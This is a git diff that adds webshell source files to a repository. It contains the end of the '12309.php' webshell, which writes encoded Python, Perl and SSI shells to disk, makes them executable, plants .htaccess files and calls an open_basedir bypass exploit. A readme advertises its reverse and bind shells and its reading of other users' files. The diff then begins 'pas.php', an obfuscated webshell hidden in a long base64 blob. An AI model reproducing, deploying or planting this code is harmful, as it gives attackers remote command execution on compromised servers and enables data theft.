+     $pyshcode.=gzinflate(base64_decode("bVRRT9swEH7Pr7jlpa0IKWObtLGmUoEClWBFbR82QRW5idNaS+LIdqBl2n/fnZ10BfGU3N33fXc+n8+o3ZkHoqikMpCshVl9d5+Ql2yV827P49uEVwZRFdPaa6B6pwMCBiC1h0aoTcqVgggaQ9bGy5QswIiCtwm0URnZrYpRLOErlvx20LlRolxPpi28tRuhFtyGK4yaGMvzRIZlYMVPQsky3DAd/+a7rj+/mE3uF/GP0d3Y7+EBdKJEZUqGBUUHhIdXwKXHc83fon3fS3kGa24yqYruE8trngttAjAbTq4ASmkqxTUvTdTpULqUGYbUP389QARkgucpiBL2ZMQAlo7EVmVfuwWTCFiZB2svUe1/Fow1lVoVMLuKdxudBt+DD5HzPyyd2Bu11/DQVkawvbArViO0YFU3Z8UqZbA9g63DBm8Ueu/kcAoeKG5qVdqg17A2nKW2uf7gZnF3OxzcjEeXw8FisrgdD9ELR4e3cERAOAYGF9cTWO3gqn552RWsDKCuUJan5Px4+unk26DvNAZ9p3g+vfxFgt5KpjteUtLOoG+9CKHUHQ/HF0viWtvg+XAuC242OIDwjN2GZ5yUNXJQbDYc3M/GSMG2xzHVFscQISuOCybKOO7Qa6HpBP9Clgbpx3QLZ2D41vQ3psj9BmBHo8CM+JbCK2rZ3EjF1vTw2gFqh+6hkxRpZxmQgVHsIdoYt+12sTbtQX+91mgafTWd3cHdeHEzvYwe/fvpfPHoA0uMkGX0fsuHA1FWtQHyIAUTIYPOgwYdCC0tXsj6fPLou/44RgPS9aoQBLOjgI5r2eL6VI69mdeVezTS7oQ0hy5Gt9IJGndgb9CpLMY/F6PZeASJzHXkfz3xQcln/Dv94uM14duwaw4g2Yg8jXE9CRyavYG7yi2ESla8PO26BL03hDDJpbb3AjjLus6JdKgRKmx39zWN3Ac8dw7HpvdrVyuM7QcvIAD36hxsP5DkyjBZuw8PtGj94bLIeZRZJ81LFuLE2FZ3e6GucmFyUXLtWLSJyKRFxNwTd9nIedDpfttT6p9zNm/H+wc="));
+     $htaccess=$htaccesses['cgi'];
+     if (strnatcmp(version(),"5.2.9") <= 0) {
+      sploent516();
+     }
+     $fh=fopen($_POST["dir"]."/".$_POST["file"],"w");
+     if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; }
+     else {
+      fwrite($fh,$pyshcode);
+      fclose($fh);
+      echo $_POST["file"]." write done, chmoding..<br>";
+      $ch=chmod($_POST["dir"]."/".$_POST["file"], 0755);
+      if (!$ch) {
+       echo "chmod failed, make chmod 755 manually<br>";
+      } else {
+       echo "chmod done<br>";
+      }
+      if ($_POST["htaccess"] == "on") {
+       $fh=fopen($_POST["dir"]."/.htaccess","w");
+       fwrite($fh,$htaccess);
+       fclose($fh);
+       echo "htaccess done";
+      }
+     }
+     break;
+    case "perlsh":
+     //author/license unknown
+     if ($failflag=="1") {
+      $perlbin="/usr/bin/perl";
+     } else {
+      $perlbin=search("perl",$failflag);
+     }
+     $perlshcode='#!'.$perlbin;
+     $perlshcode.="\n";
+     $perlshcode.=gzinflate(base64_decode("TVFLTwIxEL73V4wNMSXZFdSYGBY2QQ7E+DioRxKtu7PSpNuubRdQ5L87XYR4m3bme8w3rUeYzW/hcz1IjX3dLEOtYeSDNKV05SBj7X5gNJpJ19CYqGSQ2r/YG2fXHl0/Y41TJsASZYlOpMVSOo8BJjnwNlTpNe8njAhdeI3kItXSfHRd1/IE0qCCxu7NiUtVIKCRTtaiD33YsvoLeiuY/P3xFT8K9lYJ8PG7yxeGZ91cUDXalqThcpgxbQupofd8O99O758edvTt23fYQqEtLXU3fTwwcSCCUiHwPwaewS5jvUaVBLINGkHTpEZOLvLTc/iJLjpAIc0bWTk5IxPQGo3eg4hAGsAV6W+Z1NLV4mDuaL+zPg64oWhQQmG1nyz49XDBISZL9cXVgufkbL1UGgWMyUMeM4GOgCwemQYHmjySEmSvOSSxf8vu2AGxP0dlXZ2wCK0U6lKkRtY4ySljOotX31RTkFTTHi3uL5TEDGsVBJ/beFg0ZUcDVHT3pbU31I7Svw=="));
+     $htaccess=$htaccesses['cgi'];
+     if (strnatcmp(version(),"5.2.9") <= 0) { 
+      sploent516();
+     }
+     $fh=fopen($_POST["dir"]."/".$_POST["file"],"w");
+     if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } 
+     else {
+      fwrite($fh,$perlshcode);
+      fclose($fh);
+      echo $_POST["file"]." write done, chmoding..<br>";
+      $ch=chmod($_POST["dir"]."/".$_POST["file"], 0755);
+      if (!$ch) {
+       echo "chmod failed, make chmod 755 manually<br>";
+      } else {
+       echo "chmod done<br>";
+      }
+      if ($_POST["htaccess"] == "on") {
+       $fh=fopen($_POST["dir"]."/.htaccess","w");
+       fwrite($fh,$htaccess);
+       fclose($fh);
+       echo "htaccess done";
+      }
+     }
+     break;
+    case "ssish":
+     // code by profexer
+     $ssishcode=gzinflate(base64_decode("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"));
+     $htaccess=$htaccesses['ssi'];
+     if (strnatcmp(version(),"5.2.9") <= 0) { 
+      sploent516();
+     }
+     $fh=fopen($_POST["dir"]."/".$_POST["file"],"w");
+     if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; }
+     else {
+      fwrite($fh,$ssishcode);
+      fclose($fh);
+      echo $_POST["file"]." write done<br>";
+      if ($_POST["htaccess"] == "on") {
+       $fh=fopen($_POST["dir"]."/.htaccess","w");
+       fwrite($fh,$htaccess);
+       fclose($fh);
+       echo "htaccess done";
+      }
+     }
+     break;
+   }
+  }
+  break;
+// extras end ###
+ case "pi":
+  phpinfo();
+  break;
+} 
+// :)
+?>
diff --git a/php/12309/readme.md b/php/12309/readme.md
new file mode 100644
index 00000000..9fac50a3
--- /dev/null
+++ b/php/12309/readme.md
@@ -0,0 +1,22 @@
+site:  https://github.com/kairn/12309.php
+
+DESCRIPTION:
+12309.php is advanced webshell with the main aim at executing shell commands in all possible ways. it has some additional functions though.
+
+ FEATURES:
+ - you could choose desired function to execute code with (+pcntl_exec +ssh2_exec)
+ - internal Perl, Python and SSI mini-webshells - save them to disk and run, if php system functions are disabled
+ - backconnect/bind port on PHP, Python, and "classic" perl and C backconnect/bind. Also there are several small one-line backconnects on different languages, useful too coz they do not need to save temporary file somewhere
+ - fully interactive backconnect on Python (yes, you can run even vim & mc via backconnect!)
+ - on old php versions (such as 5.1.6, 5.2.9) this script could bypass open_basedir and read other users` files (if you`re running it with webserver`s rights, i.e. kind of apache-mpm-prefork or -worker, not kind of -itk or -peruser, and if your account is not in chroot/jail). Also there is ability to read files with mysql and with usual file_get_contents
+ - nice extra functions (file manager, file editor, system info, text coders/decoders, local open ports scanner, etc)
+
+ LICENSE:
+3-clause BSD:
+http://en.wikipedia.org/wiki/BSD_licenses#3-clause_license_.28.22New_BSD_License.22_or_.22Modified_BSD_License.22.29
+Copyright © 2010-2011, 12309, jabber: z12309@exploit.im, url: https://github.com/kairn/12309.php
+parts of code are licensed under GPL, CC, BSD, WTFPL. if your religion forbids using one of these licenses, do not use this script.
+
+ THANKS:
+thanks for your help: Tidus, Shift, pekayoba, Zer0, ForeverFree, r00nix
+and all people whose code i borrowed: Endeveit, Michael Schierl, b374k, tex, ont.rif, oRb, Eric A. Meyer, Eugen, profexer, Bernardo Damele, Michael Foord, security-teams.net, pentestmonkey.net, metasploit.com
\ No newline at end of file
diff --git a/php/pas/pas.php b/php/pas/pas.php
new file mode 100644
index 00000000..16c90717
--- /dev/null
+++ b/php/pas/pas.php
@@ -0,0 +1,255 @@
+<?php $g___g_='base'.(32*2).'_de'.'code';$g___g_=$g___g_(str_replace("\n", '', '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
